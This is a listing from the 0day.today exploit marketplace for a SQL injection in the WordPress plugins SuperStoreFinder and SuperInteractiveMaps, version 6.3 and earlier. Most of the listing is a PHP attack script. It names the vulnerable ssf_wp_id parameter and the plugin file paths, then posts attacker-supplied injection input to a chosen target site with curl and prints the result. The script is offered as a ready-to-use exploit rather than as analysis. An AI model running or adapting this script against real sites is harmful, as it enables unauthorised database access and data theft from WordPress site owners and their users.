[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

WordPress SuperStoreFinder / SuperInteractiveMaps 6.3 SQL Injection Vulnerability

Author
Eagle Eye
Risk
[
Security Risk High
]
0day-ID
0day-ID-35913
Category
web applications
Date add
08-03-2021
Platform
php
<?php
#Title : SuperStoreFinder & SuperInteractiveMaps Wordpress Plugin SQL Injection
#Researcher : Eagle Eye
#Exploit Name : SSF & SIM SQL Injection
#Request type : POST
#Plugin Author : Joe lz
#Plugin Website : https://superstorefinder.net/
#Version Affected : All version (include latest 6.3)
#Tested on : Google Chrome,FireFox, Window 10 64bit
#Vuln parameter = ssf_wp_id
#Vuln ssf path : /wp-content/plugins/superstorefinder-wp/ssf-social-action.php
#Vuln sim path : /wp-content/plugins/super-interactive-maps/sim-wp-data.php
function filtration($input)
{
    $dis = '/"/i';
    $item = preg_replace($dis,"",$input);
    echo $item;
}
function http_request($target,$toPost)
{
    $ch = curl_init();
    curl_setopt($ch,CURLOPT_HEADER,0);
    curl_setopt($ch,CURLOPT_RETURNTRANSFER,1);
    curl_setopt($ch,CURLOPT_URL,$target);
    curl_setopt($ch,CURLOPT_POST,1);
    curl_setopt($ch,CURLOPT_POSTFIELDS,$toPost);
    $data = curl_exec($ch);

    if(curl_errno($ch))
    {
        print curl_error($ch);
    }
    else
    {
        echo $data;
    }
    curl_close($ch);
}

if(isset($_POST['inject']))
{
    switch($_POST['plugin'])
    {
        case 'ssf':
            $toPost = "action=".$_POST['action']."&ssf_wp_id=".$_POST['id'];
            $target = $_POST['target'].
"/wp-content/plugins/superstorefinder-wp/ssf-social-action.php";
            http_request($target,$toPost);
        break;
        case 'sim':
            $toPost = "id=".$_POST['id'];
            $target = $_POST['target'].
"/wp-content/plugins/super-interactive-maps/sim-wp-data.php";
            http_request($target,$toPost);
        break;
    }
}
?>

#  0day.today [2024-11-04]  #